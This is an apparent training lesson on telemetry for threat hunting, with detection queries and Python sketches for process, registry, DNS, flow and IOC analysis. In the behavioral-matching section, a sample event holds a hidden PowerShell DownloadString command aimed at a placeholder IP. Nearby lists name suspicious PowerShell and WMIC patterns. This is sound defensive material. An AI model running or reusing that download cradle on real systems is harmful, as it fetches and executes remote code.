📚 Learning Objectives

By the end of this lesson, you will be able to:

  • Identify the key data source categories used in threat hunting
  • Describe the endpoint, network, and log telemetry most useful for hunts
  • Apply log aggregation and correlation techniques across data sources
  • Integrate threat intelligence into hunting queries
  • Address data quality and normalization challenges

🔍 Data Sources Overview

Importance of Data Sources

Effective threat hunting relies heavily on the quality, breadth, and depth of available data sources. The more comprehensive your data collection, the better your chances of detecting sophisticated threats that may have evaded traditional security controls.

🔑 Key Principles for Data Sources:

  • Completeness: Collect data from all relevant sources
  • Quality: Ensure data accuracy and integrity
  • Timeliness: Real-time or near real-time collection
  • Retention: Maintain historical data for analysis
  • Normalization: Standardize data formats for correlation

Data Source Categories

🖥️ Endpoint Data

  • Process execution logs
  • File system changes
  • Registry modifications
  • Network connections
  • User activity logs

🌐 Network Data

  • Network flow data (NetFlow)
  • Packet capture (PCAP)
  • DNS query logs
  • Proxy logs
  • Firewall logs

📋 System Logs

  • Windows Event Logs
  • Syslog messages
  • Application logs
  • Security logs
  • Authentication logs

🎯 Threat Intelligence

  • IOC feeds
  • Threat actor profiles
  • Malware signatures
  • TTP information
  • Vulnerability data

🖥️ Endpoint Telemetry Data

Process Monitoring

Purpose: Track process creation, execution, and termination events

📊 Key Data Points:

  • Process name and path
  • Command line arguments
  • Parent process information
  • User and session context
  • Timing information

🔍 Hunting Use Cases:

  • Detection of suspicious process chains
  • Identification of living-off-the-land techniques
  • Analysis of lateral movement patterns
  • Monitoring of privilege escalation attempts

💻 Example Queries:

# PowerShell execution detection
ProcessName = "powershell.exe" AND CommandLine CONTAINS "-enc"

# Suspicious parent-child relationships
ParentProcessName = "explorer.exe" AND ProcessName = "cmd.exe"

# Process execution from temp directories
ProcessPath CONTAINS "temp" OR ProcessPath CONTAINS "appdata"
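
The `-enc` flag in the first query is shorthand for PowerShell's `-EncodedCommand` parameter, which takes a Base64-encoded, UTF-16LE command string. Below is a minimal Python sketch for decoding such an argument during triage; the sample command line is hypothetical.

import base64
import re

def decode_encoded_command(command_line):
    """Extract and decode a Base64 -EncodedCommand argument from a PowerShell command line."""
    # -enc / -EncodedCommand accepts Base64 of a UTF-16LE encoded command string
    match = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", command_line, re.IGNORECASE)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")

# Hypothetical captured command line for illustration
cmdline = "powershell.exe -enc " + base64.b64encode('Write-Host "hi"'.encode("utf-16-le")).decode()
print(decode_encoded_command(cmdline))  # -> Write-Host "hi"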
                        

File System Monitoring

Purpose: Track file creation, modification, and deletion events

📊 Key Data Points:

  • File path and name
  • File size and timestamps
  • File hash values
  • File permissions and attributes
  • Process performing the operation

🔍 Hunting Use Cases:

  • Detection of malware drops
  • Identification of data exfiltration
  • Monitoring of configuration changes
  • Analysis of persistence mechanisms

💻 Example Queries:

# Suspicious file extensions
FileName ENDS WITH ".scr" OR FileName ENDS WITH ".pif"

# Files created in system directories
FilePath CONTAINS "system32" AND EventType = "FileCreated"

# Unusually large files created (> 100 MB), possible exfiltration staging
FileSize > 100000000 AND EventType = "FileCreated"
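
Where endpoint telemetry lacks hash values, hunters sometimes compute them on demand. The Python sketch below applies the same checks as the queries above and includes a chunked SHA-256 helper; it assumes file events arrive as dicts with FilePath, EventType, and FileSize fields, a simplified schema for illustration.

import hashlib
from pathlib import Path

SUSPICIOUS_EXTENSIONS = {".scr", ".pif"}
LARGE_FILE_BYTES = 100_000_000  # roughly 100 MB

def sha256_of(path):
    """Hash a file in chunks so large files don't exhaust memory (use to enrich events lacking hashes)."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def flag_file_event(event):
    """Return the reasons a file event looks suspicious (empty list = nothing flagged)."""
    reasons = []
    path = Path(event["FilePath"])
    if path.suffix.lower() in SUSPICIOUS_EXTENSIONS:
        reasons.append("suspicious extension")
    if "system32" in str(path).lower() and event["EventType"] == "FileCreated":
        reasons.append("created in system directory")
    if event.get("FileSize", 0) > LARGE_FILE_BYTES:
        reasons.append("unusually large file")
    return reasons

# Hypothetical event record for illustration
print(flag_file_event({"FilePath": r"C:\Windows\system32\update.scr",
                       "EventType": "FileCreated", "FileSize": 4096}))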
                        

Registry Monitoring

Purpose: Track registry key and value modifications

📊 Key Data Points:

  • Registry key path
  • Value name and data
  • Operation type (create, modify, delete)
  • Process performing the operation
  • Timestamp of the change

🔍 Hunting Use Cases:

  • Detection of persistence mechanisms
  • Identification of system configuration changes
  • Monitoring of security software tampering
  • Analysis of privilege escalation attempts

💻 Example Queries:

# Run key modifications
RegistryPath CONTAINS "Run" AND EventType = "RegistryModified"

# Security software tampering (e.g., Windows Defender policy keys)
RegistryPath CONTAINS "Windows Defender" AND EventType IN ("RegistryModified", "RegistryDeleted")

# Suspicious value data
RegistryValue CONTAINS "powershell" OR RegistryValue CONTAINS "cmd"
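
As a concrete illustration of the Run-key use case, the sketch below enumerates autorun entries with Python's Windows-only winreg standard-library module and flags values that reference common abuse patterns. It is a minimal example, not a substitute for EDR registry telemetry.

import winreg  # Windows-only standard library module

RUN_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
]
SUSPICIOUS_TOKENS = ("powershell", "cmd", "wscript", "temp", "appdata")

def enumerate_run_entries():
    """Yield (key_path, value_name, value_data) for every autorun entry found."""
    for hive, key_path in RUN_KEYS:
        try:
            key = winreg.OpenKey(hive, key_path)
        except OSError:
            continue  # key missing or access denied
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break  # no more values under this key
                yield key_path, name, str(data)
                index += 1

for key_path, name, data in enumerate_run_entries():
    if any(token in data.lower() for token in SUSPICIOUS_TOKENS):
        print(f"Review autorun entry: {key_path}\\{name} -> {data}")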
                        

🌐 Network Traffic Analysis

Network Flow Data (NetFlow)

Purpose: Analyze network communication patterns and connections

📊 Key Data Points:

  • Source and destination IP addresses
  • Source and destination ports
  • Protocol information
  • Byte and packet counts
  • Connection duration and timing

🔍 Hunting Use Cases:

  • Detection of C2 communications (see the beaconing sketch after this list)
  • Identification of data exfiltration
  • Analysis of lateral movement
  • Monitoring of suspicious connections
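
The beaconing sketch referenced above is a Python example that assumes flow records are available as dicts with SourceIP, DestinationIP, and StartTime (epoch seconds) fields, a simplified stand-in for exported NetFlow. It flags source/destination pairs whose connection intervals are suspiciously regular.

from collections import defaultdict
from statistics import mean, pstdev

def find_beacon_candidates(flows, min_connections=10, max_jitter_ratio=0.2):
    """Flag (source, destination) pairs whose connection start times are suspiciously regular."""
    by_pair = defaultdict(list)
    for flow in flows:
        by_pair[(flow["SourceIP"], flow["DestinationIP"])].append(flow["StartTime"])

    candidates = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        intervals = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(intervals)
        # Low jitter relative to the average interval suggests automated beaconing
        if avg > 0 and pstdev(intervals) / avg < max_jitter_ratio:
            candidates.append((pair, avg))
    return candidates

# Hypothetical flows: one host calls out every ~60 seconds
flows = [{"SourceIP": "10.0.0.5", "DestinationIP": "203.0.113.7", "StartTime": 1_700_000_000 + 60 * i}
         for i in range(20)]
print(find_beacon_candidates(flows))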

DNS Query Analysis

Purpose: Monitor domain name resolution requests

📊 Key Data Points:

  • Query domain names
  • Query types (A, AAAA, MX, etc.)
  • Response information
  • Client IP addresses
  • Query frequency and patterns

🔍 Hunting Use Cases:

  • Detection of DNS tunneling (see the entropy sketch after this list)
  • Identification of domain generation algorithms
  • Analysis of suspicious domains
  • Monitoring of data exfiltration via DNS
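
The sketch below illustrates the tunneling and DGA use cases with a simple label-entropy heuristic in Python. The thresholds are illustrative assumptions and would need tuning against your own DNS logs.

import math
from collections import Counter

def shannon_entropy(label):
    """Bits of entropy per character in a DNS label; random-looking labels score high."""
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_suspicious(query_name, max_label_len=40, entropy_threshold=3.5):
    """Heuristic check for DGA-style or tunneling-style query names."""
    labels = query_name.rstrip(".").split(".")
    # Ignore the registered domain and TLD (simplified; does not handle multi-part TLDs)
    subdomain_labels = labels[:-2] if len(labels) > 2 else labels
    for label in subdomain_labels:
        if len(label) > max_label_len or (len(label) >= 12 and shannon_entropy(label) > entropy_threshold):
            return True
    return False

# Hypothetical query names for illustration
for name in ["www.example.com", "a9f3k2q8z7x1m4b6c0d5e8f2.tunnel.example.net"]:
    print(name, "->", looks_suspicious(name))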

Packet Capture (PCAP)

Purpose: Deep packet inspection for detailed network analysis

📊 Key Data Points:

  • Full packet payload
  • Protocol headers
  • Application layer data
  • Encrypted traffic metadata
  • Timing and sequence information

🔍 Hunting Use Cases:

  • Deep analysis of suspicious traffic (see the triage sketch after this list)
  • Identification of custom protocols
  • Analysis of encrypted communications
  • Reconstruction of attack sequences
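
The triage sketch referenced above is a first-pass Python example using the third-party scapy package (pip install scapy) to total bytes per source/destination pair in a capture; "capture.pcap" is a placeholder path, and this is not a full deep-packet-inspection workflow.

from collections import defaultdict

from scapy.all import IP, rdpcap

def bytes_per_conversation(pcap_path):
    """Sum packet bytes per (source IP, destination IP) pair in a capture."""
    totals = defaultdict(int)
    for packet in rdpcap(pcap_path):
        if IP in packet:
            totals[(packet[IP].src, packet[IP].dst)] += len(packet)
    return totals

if __name__ == "__main__":
    # Print the ten largest conversations as a starting point for deeper analysis
    for (src, dst), total in sorted(bytes_per_conversation("capture.pcap").items(),
                                    key=lambda item: item[1], reverse=True)[:10]:
        print(f"{src} -> {dst}: {total} bytes")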

📋 Log Aggregation and Correlation

Centralized Log Management

Effective threat hunting requires centralized collection and normalization of logs from diverse sources.

Windows Event Logs

  • Security Log: Authentication and authorization events
  • System Log: System-level events and errors
  • Application Log: Application-specific events
  • PowerShell Log: PowerShell execution events

Linux/Unix Logs

  • Syslog: System and application messages
  • Auth Log: Authentication events
  • Kernel Log: Kernel-level events
  • Application Logs: Service-specific logs

Network Device Logs

  • Firewall Logs: Traffic filtering and blocking events
  • Router Logs: Routing and network events
  • Switch Logs: Port and VLAN events
  • Proxy Logs: Web traffic and filtering events

Log Correlation Techniques

Time-based Correlation

Correlate events that occur within specific time windows to identify attack sequences.

# Example: Successful login preceded by repeated failed logins for the same account within 5 minutes
EventType = "SuccessfulLogin"
AND COUNT(FailedLogin WHERE Username = SuccessfulLogin.Username AND Time WITHIN 5 minutes BEFORE SuccessfulLogin.Time) >= 3
                        

IP-based Correlation

Track activities from specific IP addresses across multiple data sources.

# Example: Track all activities from suspicious IP
SourceIP = "192.168.1.100" OR DestinationIP = "192.168.1.100"
                        

User-based Correlation

Monitor all activities associated with specific user accounts.

# Example: Track user activities across systems
Username = "admin" OR UserSID = "S-1-5-21-..."
                        

🎯 Threat Intelligence Integration

Types of Threat Intelligence

Indicators of Compromise (IOCs)

  • IP Addresses: Malicious or suspicious IPs
  • Domain Names: Malicious domains and URLs
  • File Hashes: MD5, SHA1, SHA256 of malware
  • Email Addresses: Phishing and spam sources

Tactics, Techniques, and Procedures (TTPs)

  • Attack Patterns: Common attack methodologies
  • Tools and Techniques: Malware and attack tools
  • Infrastructure: C2 servers and domains
  • Behavioral Patterns: Attacker behaviors and habits

Threat Actor Intelligence

  • Attribution: Known threat groups and actors
  • Motivations: Financial, political, espionage
  • Capabilities: Technical skills and resources
  • Targeting: Industries and organizations

Integration Strategies

Automated IOC Matching

Automatically match collected data against known IOCs from threat intelligence feeds.

# Example: Match network connections against malicious IPs
NetworkConnection.SourceIP IN ThreatIntelligence.MaliciousIPs
OR NetworkConnection.DestinationIP IN ThreatIntelligence.MaliciousIPs
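
A minimal Python sketch of automated IOC matching, assuming connection records with SourceIP and DestinationIP fields and a set of malicious IPs already loaded from a feed (the addresses below are documentation-range placeholders):

# Hypothetical feed contents; in practice these would be loaded from a TI platform or a CSV/STIX feed
MALICIOUS_IPS = {"198.51.100.23", "203.0.113.99"}

def match_connections(connections, malicious_ips):
    """Yield connection records whose source or destination IP appears in the IOC set."""
    for conn in connections:
        if conn["SourceIP"] in malicious_ips or conn["DestinationIP"] in malicious_ips:
            yield conn

connections = [
    {"SourceIP": "10.0.0.8", "DestinationIP": "203.0.113.99", "DestinationPort": 443},
    {"SourceIP": "10.0.0.9", "DestinationIP": "192.0.2.10", "DestinationPort": 80},
]
for hit in match_connections(connections, MALICIOUS_IPS):
    print("IOC match:", hit)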
                        

Behavioral Pattern Matching

Search for activities that match known attack patterns and techniques.

# Example: Detect living-off-the-land techniques
ProcessName IN ["powershell.exe", "cmd.exe", "wmic.exe"] 
AND CommandLine CONTAINS ThreatIntelligence.SuspiciousCommands
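
A Python sketch of the same idea, with an assumed, illustrative list of suspicious command-line patterns standing in for a real threat-intelligence feed:

import re

LOLBINS = {"powershell.exe", "cmd.exe", "wmic.exe", "mshta.exe", "regsvr32.exe"}
# Hypothetical patterns; real deployments would source these from TI or curated detection content
SUSPICIOUS_PATTERNS = [r"-enc\b", r"downloadstring", r"invoke-webrequest", r"process\s+call\s+create"]

def matches_lolbin_pattern(event):
    """True if a process event pairs a living-off-the-land binary with a suspicious command line."""
    if event["ProcessName"].lower() not in LOLBINS:
        return False
    cmdline = event["CommandLine"].lower()
    return any(re.search(pattern, cmdline) for pattern in SUSPICIOUS_PATTERNS)

event = {"ProcessName": "powershell.exe",
         "CommandLine": "powershell.exe -NoP -W Hidden (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')"}
print(matches_lolbin_pattern(event))  # -> True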
                        

Contextual Enrichment

Enrich hunting queries with contextual information from threat intelligence.

# Example: Search for activity matching indicators attributed to a specific threat group
ThreatIntelligence.AttributedGroup = "APT29"
AND (DestinationIP IN ThreatIntelligence.IPs OR FileHash IN ThreatIntelligence.FileHashes)
                        

📊 Data Quality and Normalization

Data Quality Challenges

Ensuring high-quality data is crucial for effective threat hunting. Poor data quality can lead to missed threats or false positives.

Data Inconsistency

Different systems may log the same event in different formats or with different field names.

Solutions:
  • Implement data normalization rules
  • Use standard field naming conventions
  • Create data mapping tables

Missing Data

Some events may not be logged due to configuration issues or system limitations.

Solutions:
  • Implement comprehensive logging policies
  • Use multiple data sources for redundancy
  • Monitor data collection health

Data Volume

Large volumes of data can overwhelm analysis capabilities and slow down hunting activities.

Solutions:
  • Implement data filtering and aggregation
  • Use tiered storage strategies
  • Optimize query performance

Data Normalization Techniques

Field Standardization

Standardize field names and formats across all data sources.

# Standard field names
SourceIP, DestinationIP, SourcePort, DestinationPort
EventTime, EventType, UserName, ProcessName
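
A Python sketch of field standardization, using hypothetical per-source mapping tables from native field names to the standard names above:

# Hypothetical per-source mappings from native field names to the standard schema
FIELD_MAPS = {
    "windows_security": {"IpAddress": "SourceIP", "TargetUserName": "UserName",
                         "NewProcessName": "ProcessName", "TimeCreated": "EventTime"},
    "firewall": {"src": "SourceIP", "dst": "DestinationIP", "spt": "SourcePort",
                 "dpt": "DestinationPort", "ts": "EventTime"},
}

def normalize_record(source, record):
    """Rename a raw record's fields to the standard schema; unmapped fields are kept as-is."""
    mapping = FIELD_MAPS.get(source, {})
    return {mapping.get(field, field): value for field, value in record.items()}

raw = {"src": "10.0.0.5", "dst": "203.0.113.7", "dpt": 443, "ts": "2024-01-15T14:30:25Z"}
print(normalize_record("firewall", raw))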
                        

Time Standardization

Convert all timestamps to a common timezone and format.

# UTC timestamp format
EventTime: "2024-01-15T14:30:25.123Z"
                        

Value Normalization

Normalize values to consistent formats (e.g., lowercase, trimmed strings).

# Normalized values
ProcessName: "powershell.exe" (not "PowerShell.EXE")
UserName: "john.doe" (not "JOHN.DOE")
                        

🧪 Hands-On Exercise

Exercise: Data Source Assessment and Planning

Objective: Assess available data sources and develop a data collection strategy for threat hunting.

📋 Scenarios:

Scenario 1: Small Enterprise Environment

Situation: You're setting up threat hunting for a 100-employee company with basic security infrastructure.

Requirements:
  • Identify available data sources
  • Assess data quality and completeness
  • Recommend data collection improvements
  • Develop data normalization strategy

Scenario 2: Large Enterprise Environment

Situation: You're optimizing threat hunting for a 10,000-employee enterprise with comprehensive security tools.

Requirements:
  • Map all available data sources
  • Identify data gaps and redundancies
  • Optimize data collection and storage
  • Develop correlation strategies

Scenario 3: Cloud-First Environment

Situation: You're implementing threat hunting for a cloud-native organization using AWS, Azure, and SaaS applications.

Requirements:
  • Identify cloud-specific data sources
  • Assess cloud logging capabilities
  • Plan data integration from multiple clouds
  • Address cloud security and compliance

📄 Deliverables:

  • Data source inventory and assessment
  • Data collection strategy document
  • Data normalization and correlation plan
  • Implementation roadmap with priorities

📊 Knowledge Check

Question 1: What is the primary purpose of endpoint telemetry data in threat hunting?

Question 2: Which data source is most effective for detecting DNS tunneling attacks?

Question 3: What is the main challenge with data normalization in threat hunting?

🔗 Additional Resources